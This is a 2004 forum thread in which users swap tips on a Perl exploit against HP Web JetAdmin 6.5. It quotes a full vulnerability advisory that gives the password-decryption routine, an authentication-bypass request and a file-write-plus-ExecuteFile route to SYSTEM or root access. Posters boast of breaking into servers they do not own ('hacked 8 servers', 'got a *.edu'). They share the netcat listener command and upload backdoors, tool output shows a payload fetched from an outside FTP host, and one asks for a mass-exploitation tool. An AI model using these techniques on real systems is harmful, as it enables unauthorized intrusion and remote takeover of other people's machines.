Thanks dude, that's a nice perl exploit to test your network... Btw, lots of people are using this thing...
BuzzDee
Apr 27 2004, 10:13 PM
hmm doesnt work for me yet. i got to the point where it says do u wnat to upload file via ftp or tftp but the files never got uplaoded...
edit: ok - got the first one working. not every time u get upload via ftp or tftp it worx. tried about 10 times and it worked one time :/
but i changed the code a bit and now it worx really fine
mortello
Apr 27 2004, 11:53 PM
Is it me or the code has an error....I really don't know anything about perl, so touching the code didn't do much...all I know is that there is a } that is too much, or maybe a { that is not there....
anyone can help me ?
Edit : Found the problem....trying it now
RizL4
Apr 28 2004, 12:03 AM
BuzzDee can u plz post it plz
qcred11
Apr 28 2004, 12:42 AM
Some extras:
QUOTE
[ Title ] Multiple vulnerabilities in HP Web JetAdmin
[ Affected Products ] Hewlett Packard (HP) Web JetAdmin 6.5 on any platform
Partially affected: Web JetAdmin 7.0 on any platform Web JetAdmin <=6.2 on any platform
HP Bug ID: SSRT2397 CERT VU ID: VU#606673
[ Vendor communication ] 10/28/02 Initial Notification, security-alert@hp.com *Note-Initial notification by Phenoelit includes a CC: to cert@cert.org by default
From there on, communication went back and forth, while the major version went up and only a subset of the bugs was fixed.
[ Overview ] HP Web JetAdmin is an enterprise management system for large amounts of HP printers, print servers and their respective print queues. The service provides a web interface for administration, by default listening on port 8000. The web server (HP-Web-Server-3.00.1696) is a modular service supporting plugins and using .hts and .inc files for creation of active content.
From the readme_en.txt file: ''HP Web JetAdmin contains support for all HP JetDirect-connected printers and plotters. This product allows users to manage HP JetDirect-connected printers within their intranet using a browser. In addition to this, HP Web JetAdmin has the ability to discover and manage any non-HP printer that implements the standard printer MIB (RFC 1759). If a peripheral includes an embedded web server, HP Web JetAdmin provides a link to the home page of the peripheral.''
NOTE: (Historic, see initial date!) Despite the fact that the HP web site still advertises it as 6.5, the Web JetAdmin you can currently download is 7.0. This one features an Apache core and several improvements, including SSL support with a vulnerable version of OpenSSL (0.9.6c). Password decryption and direct calls of functions are still possible, but some of the exploited functions are no longer existing.
[ Description ] Multiple vulnerabilities exist in the product. A short summary is outlined below: 1 - Source disclosure of HTS and INC files 2 - Real path disclosure of critical files 3 - Critical files accessible through web server 4 - User and Administrator password disclosure and decryption 5 - User and Administrator password replay 6 - Root/Administrator password disclosure 7 - Denial of Service of the server due to input validation failure 8 - Authentication circumvention on all functions 9 - Direct access to methods of the server core and the plugins via the HTTP Protocol 10 - Input validation failure for strings written to files 11 - Root/Administrator compromise due to all of the above 12 - Hidden games (easter egg) in the application
[ 2 ] Any page that is generated by the .HTS scripts will include a HTML comment line with the location of the file framework.ini, which holds several critical entries. Example: <!-- framework.ini F:\Program Files\HP Web JetAdmin\doc\plugins\framework\framework.ini -->
[ 3 ] The file framework.ini is located inside the web root directory. Any unauthenticated user can access it. This file contains the encrypted (see below) passwords for all users, permissions for the respective users and other valuable information. Example: http://server:8000/plugins/framework/framework.ini
[ 4 ] HP Web JetAdmin uses it's own encryption. Passwords will be encrypted on client side before send to the server using a Java applet. The encryption is easily broken and reversible. An encrypted username or password is transmitted and stored in the ASCII representation of hexadecimal numbers. Such a ciphertext looks like 6a206d14000a7c2bc3cd3358153cffb5. This string has three elements: - 6a206d14 is the initialization vector for the algorithm - 000a is the length of the encrypted data (and double the length of the clear text) - 7c2bc3cd3358153cffb5 is the actual encrypted data
Encryption and decryption are performed by initializing a random number generator with the IV supplied in the string and performing an XOR operation with the encrypted data and the upper 8 bits of the subsequently calculated random numbers. The following pseudo-code will be run:
long v = IV; for(int i=0;i<strlen(code);i++){ v = 31413L * v + 13849L & -1L; code[i]=code[i]^(char)(v >> 24); }
As the result, the clear text will be in code[] as two-byte characters.
[ 5 ] Because of the static nature of the encryption broken in point 4, an attacker can use password strings sniffed off the network and use them in selfmade HTTP requests to the service. This is commonly referred to as replay attack.
[ 6 ] When using services the host system provides only to administrative users (Administrator on Windows, root on UNIX), the web interface will require the user to enter the account data for this account. The entered username, password and (for Windows) the domain name are encrypted with the algorithm discussed in 4. Therefore, an attacker can sniff the strings off the network and decrypt the account information.
[ 7 ] By modifying the "encrypted" string, an attacker can cause the service to lock up. As discussed in point 4, the second element in the string represents the length of the encrypted data. By replacing it with 0xFFFF, the decryption function loops through the string until the index reaches -1, which never happend during tests and resulted in a completely frozen service. Example: 01010101FFFF02020202020202020202.
[ 8 ] Access to the functionality of Web JetAdmin is usually done via HTTP POST requests. One of the variables always present is "obj". A typical request contains: obj=Framework:CheckPassword;Httpd:SetProfile(Profiles_Admin,password,$_pwd,$__framework_ini) By leaving out the element "Framework:CheckPassword;", HP Web JetAdmin will no longer validate the supplied password and immediately grant access to the function specified. Example: obj=Httpd:SetProfile(Profiles_Admin,password,$_pwd,$__framework_ini)
[ 9 ] The "obj" variable discussed in 8 is actually used to call functions in the server core or any plugin. The server core and the plugins export functions to be used via HTTP. Therefore, an attacker can craft HTTP POST requests to use internal functions. Additionally, use of variables and grouping of function calls are possible. One can actually write little programs and submit them to the server for execution. Most of the functions deal with internal data structures and files of HP Web JetAdmin. Example: see 8
[ 10 ] HP Web JetAdmin uses a file called "cache.ini" outside of the web root. This file will contain session settings for a specific session. The session is identified by a variable called __BrowserID submitted in every HTTP request of the session. The format of cache.ini is: ---SNIP-- [1234] Variable=Value NextVariable=NextValue
[5678] ... ---SNIP-- where 1234 and 5678 are the browser ID values. An attacker can influence the Variable=Value pairs through the call interface described in 9. By calling obj=Httpd:VarCacheSet(FX,MemberOfPhenoelit)&__BrowserID=0 the following cache entry is created: [0] FX=MemberOfPhenoelit
It is also possible to inject multiple lines at the beginning of the file by including HTTP encoded linefeed characters in the __BrowserID variable: &__BrowserID=%0aTest%20123%0a will create the following entry: [ Test 123 ]
[ 11 ] The Httpd core supports an exported function called "ExecuteFile". This function takes two or more parameters. The first one is the path where the file is located (leave blank for use of $PATH or %PATH%) and the second is the executable itself. Combined with the ability to write arbitrary content to a file in a known location (see 10, location known due to 2), an attacker can easily start a program of his choice. Since the service usually runs as root on UNIX or as SYSTEM on Windows, this gives full remote access to the server. Example: see Example section below
[ 12 ] The security issues described above are not the result of a lack of time in the development department. This is proven by the fact that HP Web Jetadmin is delivered including two games. A text based adventure game is available on the URI: /plugins/hpjwja/script/special.hts?waycool=notyou The HTS file special2.hts features a hangman game and a list of developers. Hint: When playing the text adventure, throw the cat toy around to keep the bad kitty busy.
[ Solution ] None known at this time. HP Web JetAdmin 7.0 fixes some of the problems - namely removed the ExecuteFile function - but most of the issues and the games are still there.
[ end of file ]
ivan288
Apr 28 2004, 06:05 AM
nice sploit. will test and report back.
BuzzDee
Apr 28 2004, 07:25 AM
CODE
BuzzDee can u plz post it plz
i just changed it so that it fits MY needs. it wont help u. well i can give it to u but i will get shells and u nothing
what i did is that it immediately uploads files via rcp (i dont like ftp and tftp...) and then executes nc -L -vvv -p [port]. that way u will have ur shell connecting to the ip with the port u specify.
edit:
i just wonder how 2 secure those servers. it says no solution found yet... is it possoble to change the banner? or does anyone have a better idea? ^^
ivan288
Apr 28 2004, 02:18 PM
well i got the files uploaded but i think they are not executed. i upped nc.exe and a .bat, and had no luck when trying to connect via nc. anyone know any script or other way to start nc to get a shell?
Stevy
Apr 28 2004, 02:23 PM
exploit works very well, hacked 8 servers with it all with nice uptime's. I currently secure them by renaming tftp + ftp and then stop the webjetadmin service.
cyrixx
Apr 28 2004, 03:39 PM
hhhhm, i always get this:
CODE
Phenoelit HP Web JetAdmin 6.5 remote Linux root and Windows NT/2000 Administrator exploit by FX of Phenoelit Research done at BlackHat Singapore 2002
cannot connect to http daemon on ***.***.***.***
. but i keep on trying
BuzzDee
Apr 28 2004, 04:43 PM
CODE
I currently secure them by renaming tftp + ftp and then stop the webjetadmin service.
renaming ftp / tftp is useless. i upload my files with rcp. i could also use other ways. u just have to change the code a bit. plz dont ask me how - it should be obvious... this method keeps away script kidz but not someone who uses his brain ^^
stopping jetadmin service is a GREAT idea LOL. im sure the admin wont recognize that...
better patch the server:
CODE
HP Web JetAdmin 7.0 fixes some of the problems - namely removed the ExecuteFile function
mortello
Apr 28 2004, 07:26 PM
After checking the code and trying to fix the stuff in it....I am unable to start anything....
I do upload a backdoor that should open a port....but that port never opens....
I use the ftp method...but the files gets uploaded to the server.....could someone point me to the right direction on to how to fix the execute functions....
because the way this was written doesn't seem to work at all !
Presnus
Apr 30 2004, 07:08 AM
Can somebody say how the port banner looks like ? should help me , because I've got tons of results !
dtDaMan
Apr 30 2004, 10:44 PM
Hi!
I edited the TFTP Part in the Script to RCP, but i doesn't works
this sploit works good, its just a matter of securing the servers now.
Presnus
May 1 2004, 12:03 PM
QUOTE (BuzzDee @ Apr 28 2004, 07:25 AM)
CODE
BuzzDee can u plz post it plz
i just changed it so that it fits MY needs. it wont help u. well i can give it to u but i will get shells and u nothing
what i did is that it immediately uploads files via rcp (i dont like ftp and tftp...) and then executes nc -L -vvv -p [port]. that way u will have ur shell connecting to the ip with the port u specify.
edit:
i just wonder how 2 secure those servers. it says no solution found yet... is it possoble to change the banner? or does anyone have a better idea? ^^
Maybe you can share it with us
..:Z:..
May 5 2004, 09:24 AM
its a relly nice perl script but em... can who post the RCP part plz
i've many bugs when i change it to rcp
THX for help and Share this nice perl script ^^ !//edit ive fixxed
nebojsa
May 6 2004, 12:24 PM
QUOTE
I currently secure them by renaming tftp + ftp and then stop the webjetadmin service.
What 's this kind of cheat , imagine that the administrator have to use this cmd , are u silly or ..... ?
totof
May 6 2004, 02:35 PM
Yeah the guy does he exist a scanner for the verion hp Jetadmin 6.5 ?? because i have a lot of ip hp jet admin but i don't know the version
OleaSTeR
May 6 2004, 05:19 PM
working fine with WIndows2000 HP Web JetAdmin Version: 6.5.1696
totof
May 10 2004, 06:58 AM
Anyone succeed to upload the file on the box i get that :
QUOTE
HP Web JetAdmin Path: C:\Program Files\HP Web JetAdmin\doc\plugins\framework\framework.ini HP Web JetAdmin Version: 6.5.1696 Target system is Windows. Do you want file upload via FTP [f] or TFTP [t]: f FTP used ... FTP Host: 83.*.*.* FTP User: pass FTP Pass: pass FTP Path: c:\documents and settings\totof.fox\mes documents\appz_hack\new FTP File: wollf.exe File wollf.exe will be downloaded from 83.*.*.*c:\documents and settings\ otof.fox\mes documents\appz_hack\new with username brand and password brand If everything works well, the specified file should be running soon in SYSTEM context. Don't stop this script until your program terminates. Enjoy the box.
Bu i can not up the file with the method ftp and tftp ?
totof
May 10 2004, 07:05 AM
finally the file is uploade but does it execute the file when the upload finished
totof
May 10 2004, 07:10 AM
finally it's works i got a *.edu
XeLoRy
Jun 9 2004, 09:35 PM
i know this exploit but it doesnt work until now "It's not version 6.5 or version extraction failed" always got this message on more than 50 box on different ip range.
anyone to compil a autohaxor ? i ve got too many result to do that one by one...
subcorner
Jun 9 2004, 10:37 PM
this exploit was really good but too much people is looking for. anyway, to secure that is not hard btw use ure brain if u can not protect it, u can stop lol i'm not on my own to find all not unprotected server
Killaloop
Jun 9 2004, 10:59 PM
QUOTE (subcorner @ Jun 9 2004, 10:37 PM)
this exploit was really good but too much people is looking for. anyway, to secure that is not hard btw use ure brain if u can not protect it, u can stop lol i'm not on my own to find all not unprotected server
you cannot secure webjet admin without installing the new version or do you think deleting about.hts is securing the hole? no it is not my exploit used other files the get the information it needs. better install the new version
winsoc
Jun 28 2004, 09:54 PM
Allo, after using the sploit against linux boxes when you get the linux boxes open with webbrowsing to xxx.xxx.xxx.xxx:3000 you just see ntop, how do I get a bash from this, or how can I install glftpd from there ? Am I not seeing the light at the end of the tunnel?
winsoc
Jul 8 2004, 10:58 AM
um.... PUSH
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
